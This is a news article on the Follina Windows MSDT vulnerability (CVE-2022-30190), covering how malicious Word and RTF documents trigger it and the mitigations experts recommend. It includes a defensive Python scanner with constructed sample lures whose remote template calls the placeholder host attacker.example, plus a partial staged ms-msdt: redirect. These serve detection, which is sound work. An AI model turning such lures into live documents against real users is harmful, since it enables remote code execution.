Microsoft: “Follina” Will Affect All Currently Supported Windows Versions

source link: https://www.theinsaneapp.com/2022/06/microsoft-follina-will-affect-all-currently-supported-windows-versions.html

Attackers are actively exploiting an unpatched and easy-to-exploit vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows that allows remote code execution through Office documents, even when macros are disabled.

The vulnerability is present in all currently supported Windows versions and can be exploited through Microsoft Office 2013 through Office 2019, Office 2021, Office 365 and Office ProPlus, according to security researchers who have examined it.

The zero-day flaw, nicknamed "Follina", allows remote execution of arbitrary code on Windows systems. Microsoft warns that it lets attackers "install applications, view, modify or erase data, or create new accounts in the manner permitted by the user's rights." Researchers have reported attacks exploiting the flaw in India and Russia dating back at least a month.

Microsoft on Monday assigned the flaw a CVE identifier, CVE-2022-30190, after initially dismissing it as not a security issue in April. That was when crazyman, a security researcher with the APT threat-hunting group Shadow Chaser Group, first reported in-the-wild exploitation of the flaw to Microsoft. While the company's advisory states that the flaw is publicly known and being actively exploited, it does not describe it as an immediate threat.

In a blog post, Microsoft recommended that organizations disable the MSDT URL protocol as a workaround and said it will release updates in the future, without giving a date. Microsoft said that both Protected View in Microsoft Office and Application Guard for Office will block attacks that try to exploit the vulnerability.

MSDT is a Windows utility that gathers diagnostic data from the user's computer and sends it to Microsoft support staff so they can analyze problems the user has encountered. According to Microsoft, the vulnerability is triggered when an Office application such as Word invokes MSDT through its URL protocol. "An attacker who can exploit this vulnerability could execute arbitrary code with the permissions of the calling application," the company noted.

Although the Shadow Chaser Group researcher first reported the vulnerability to the Microsoft Security Response Center more than a month earlier, it drew wide attention over the weekend when a researcher found a malicious Word document attempting to exploit it.

Researcher Kevin Beaumont analyzed the document and found that it used Word's remote template feature to retrieve an HTML file from an external web server. The retrieved HTML then used the MSDT URL protocol to launch code that executed a PowerShell script. Beaumont found that the document ran code even with macros disabled. He also found at least two other malicious Word documents in the wild attempting to exploit Follina, going back to April.

In addition, Beaumont and other researchers found that the attack method lets threat actors bypass Office's Protected View, the mechanism that warns users about content downloaded from the Internet and requires an additional click from them before the document is opened for editing.

According to Malwarebytes, the warning can be bypassed by converting the document to Rich Text Format (RTF). In that form the exploit runs when the file is merely previewed in the Explorer preview pane, without the user ever opening the document.
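The delivery chain described above (a .docx whose remote template points at a web server, a staged HTML file that invokes the ms-msdt: handler, and the RTF variant that fires from the preview pane) leaves static artifacts that can be triaged without opening the file. The scanner below is an added example written for this page; it is not code from the article, from Microsoft or from the researchers quoted. It inspects `word/_rels/settings.xml.rels` for an `attachedTemplate` relationship with `TargetMode="External"`, looks for the RTF `\template` control word carrying an http(s) URL, and flags any reference to the `ms-msdt:` scheme. The sample documents are constructed inline, `attacker.example` is a placeholder host, and the staged HTML deliberately omits the handler parameters.

```python
"""Static triage for the Follina delivery chain: remote templates and ms-msdt: references.

All sample inputs at the bottom are constructed for this demonstration.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"

# Only the scheme name is matched; URL handlers are case-insensitive.
MSDT_SCHEME = re.compile(rb"ms-msdt:", re.IGNORECASE)
# RTF stores an attached template as {\*\template <path>}.
RTF_TEMPLATE = re.compile(rb"\\template\s+(https?://[^}\s]+)", re.IGNORECASE)


def docx_remote_templates(data: bytes) -> list:
    """Return external attachedTemplate targets declared in a .docx (OOXML zip)."""
    targets = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if SETTINGS_RELS not in z.namelist():
            return targets  # no attached template at all
        root = ET.fromstring(z.read(SETTINGS_RELS))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if (rel.get("Type") == ATTACHED_TEMPLATE
                    and rel.get("TargetMode") == "External"):
                targets.append(rel.get("Target"))
    return targets


def scan(name: str, data: bytes) -> list:
    """Classify one file; returns (name, finding, detail) tuples, empty if clean."""
    findings = []
    if data.startswith(b"PK"):  # OOXML container (docx/dotm/...)
        for target in docx_remote_templates(data):
            findings.append((name, "docx-remote-template", target))
        # Members are compressed on disk, so search each one decompressed.
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for member in z.namelist():
                if MSDT_SCHEME.search(z.read(member)):
                    findings.append((name, "ms-msdt-reference", member))
    else:
        if data.startswith(b"{\\rtf"):
            for m in RTF_TEMPLATE.finditer(data):
                findings.append((name, "rtf-remote-template", m.group(1).decode()))
        if MSDT_SCHEME.search(data):
            findings.append((name, "ms-msdt-reference", name))
    return findings


def build_sample_docx(target: str, external: bool) -> bytes:
    """Constructed minimal .docx carrying exactly one attachedTemplate relationship."""
    mode = ' TargetMode="External"' if external else ""
    rels = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{target}"{mode}/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        z.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


# Constructed samples; attacker.example is a placeholder, not a real host.
MALICIOUS_DOCX = build_sample_docx("http://attacker.example/stage.html", True)
BENIGN_DOCX = build_sample_docx("Normal.dotm", False)  # local template, no network
STAGED_HTML = (b"<html><body><script>"
               b"location.href = 'ms-msdt:' + staged;"  # handler parameters omitted
               b"</script></body></html>")
MALICIOUS_RTF = (b"{\\rtf1\\ansi{\\*\\template http://attacker.example/stage.html}"
                 b"\\par Handset price quote\\par}")

if __name__ == "__main__":
    for name, blob in [("quote.docx", MALICIOUS_DOCX), ("memo.docx", BENIGN_DOCX),
                       ("stage.html", STAGED_HTML), ("quote.rtf", MALICIOUS_RTF)]:
        for finding in scan(name, blob) or [(name, "clean", "")]:
            print(*finding)
```

A remote template pointing at an external host is not proof of an exploit, since legitimate templates can live on intranet servers, but in mail-delivered documents it is the one indicator the Follina chain cannot avoid, and it is present before any second stage is fetched. The ms-msdt: check only catches the staged HTML if you have captured it; the document itself never contains the scheme.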

"RTF files are a particular format that allows documents to be seen inside Windows Explorer," says Jerome Segura, senior director of threat intelligence at Malwarebytes.

"When this occurs, Explorer will call the MSDT process that is being exploited, without warnings or notifications," he says. The preview pane is in fact a dangerous feature, since it allows zero-click attacks. "We advise users to disable it in Explorer and also in email clients such as Outlook."

Johannes Ullrich, dean of research at the SANS Institute, says the MSDT vulnerability by itself isn't a big issue; what is troubling is that it can be triggered through Microsoft Office. All a user has to do is open a specially crafted Word document, or in some cases simply preview it, to allow remote code execution, he says. That opens the door to widespread compromise, particularly since exploits have been circulating in the wild for more than a month.

"There are a variety of tutorials, examples and scripts that explain how to attack this security flaw. Implementing these methods is simple," Ullrich says. He points to a malicious document exploiting Follina that SANS recently found, which claimed to contain a mobile phone price quote from a reseller. The exploit worked even though it appears to have been created by a fairly inexperienced threat actor. "It seems to have been made by a beginner attacker, as it does not even take out some of the remarks that were included in this malicious file," Ullrich says.

He advises that businesses immediately follow Microsoft's guidance and disable the MSDT URL protocol. "This breaks the link between Office and the diagnostic tool," he says. The flaw in MSDT itself remains, but it will no longer be triggered by opening malicious documents, he says. SANS also recommends that businesses disable the Preview Pane in Windows Explorer.

Dray Agha, ThreatOps analyst at Huntress, who did an in-depth analysis of the vulnerability, says attackers can exploit Follina to escalate privileges and move laterally across environments. "Hackers can go from an ordinary user to admin in a matter of minutes," Agha says. "The vulnerability could be triggered by users choosing to 'preview' the content of a specially designed, maliciously delivered document. It's that easy."
